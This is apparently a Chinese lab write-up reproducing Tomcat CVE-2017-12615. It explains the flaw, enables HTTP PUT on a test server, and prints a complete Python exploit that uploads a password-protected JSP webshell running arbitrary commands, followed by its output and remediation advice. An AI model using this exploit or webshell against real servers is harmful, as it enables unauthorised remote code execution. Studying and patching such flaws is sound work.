漏洞原理Tomcat的Servlet是在conf/web.xml配置的,通过配置文件可知,当后缀名为.jsp和.jspx的时候是通过JspServlet处理请求的,而其他的精通文件是通过DefaultServlet处理的可以得知:"1.jsp "(末尾有一个空格)并不能匹配到JspServlet,而是会交由DefaultServlet去处理当处理PUT请求时:会调用resources.bind:dirContext为FileDirContext:调用rebind创建文件又由于windows不允许" "(空格)作为文件名结尾,所以会创建一个".jsp"文件,导致代码执行
漏洞环境漏洞靶机 Win 2003x64 :192.168.136.136PC主机(Python环境) :192.168.1.103漏洞存在范围:Tomcat-7.0.0-Tomcat-7.0.81
文章插图
环境搭建
win 2003x64 安装 JAVA环境Tomcat7.0.75下载:http://archive.Apache.org/dist/tomcat/tomcat-7/v7.0.75/bin/apache-tomcat-7.0.75.exe
文章插图
文章插图
开启HTTP PUT找到Tomcat的安装目录下的conf的web.xml
文章插图
文章插图
readonlyIs this context "read only", so HTTPcommands like PUT and DELETE arerejected?[true]这个意思就是说:当前是只读模式,是不允许修改的找到org.apache.catalina.servlets.DefaultServlet方法:
文章插图
【Tomcat-远程代码执行漏洞】添加如下代码并保存:
<init-param> <param-name>readonly</param-name><param-value>false</param-value></init-param>
文章插图
修改完之后,重启Tomcat:
文章插图
漏洞复现Python EXP:
#! -*- coding:utf-8 -*- import httplib import sys import time body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.Append(temp +"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("hacker".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println("Test By Power_Liu");}%>''' try:conn = httplib.HTTPConnection(sys.argv[1])conn.request(method='OPTIONS', url='/ffffzz')headers = dict(conn.getresponse().getheaders())if 'allow' in headers andheaders['allow'].find('PUT') > 0 :conn.close()conn = httplib.HTTPConnection(sys.argv[1])url = "/" + str(int(time.time()))+'.jsp/'#url = "/" + str(int(time.time()))+'.jsp::$DATA'conn.request( method='PUT', url= url, body=body)res = conn.getresponse()if res.status== 201 :#print 'shell:', 'http://' + sys.argv[1] + url[:-7]print 'shell:', 'http://' + sys.argv[1] + url[:-1]elif res.status == 204 :print 'file exists'else:print 'error'conn.close()else:print 'Server not vulnerable' except Exception,e:print 'Error:', e运行Python-EXP脚本:python2 tomcat-CVE-2017-12615.py 192.168.136.136:8080得到的shell:http://192.168.136.136:8080/1574766773.jsp
文章插图
得到一枚Webshell:
文章插图
访问:http://192.168.136.136:8080/1574766773.jsp?pwd=hacker&cmd=ipconfig
文章插图
漏洞修复将Tomcat更新到该漏洞被修复的版本(例如:Tomcat:8.5.23)readonlyinit-param不应该将false首先设置 。如果该参数保留到默认(true),则攻击者无法上传文件 。最后可以在前端安装WAF等防护软件来阻止PUT和DELETE请求 。
推荐阅读
![[雷军]2999元起 Redmi K30 Pro系列太拼了?雷军这样回应](http://ttbs.guangsuss.com/image/594354b5cbd86d62b5fff5fd61491f61)
![绿茶加生姜的作用[绿茶]](http://img.jiangsulong.com/220404/2240041515-0-lp.png)
- C++ 是如何从代码到游戏的?
- DOS命令SHUTDOWN关闭或重启本地或远程计算机
- 代码对比工具,我就用这6个
- 家里的智能电表,是如何远程抄表?
- if-else代码优化的八种方案
- 手把手教你用1行代码实现人脸识别
- 一招把你的 Python 代码提速7倍
- 除了teamviewer,还有什么远程控制服务器的工具?
- Css 画出一个扇形,附代码
- 如何将你的代码可视化?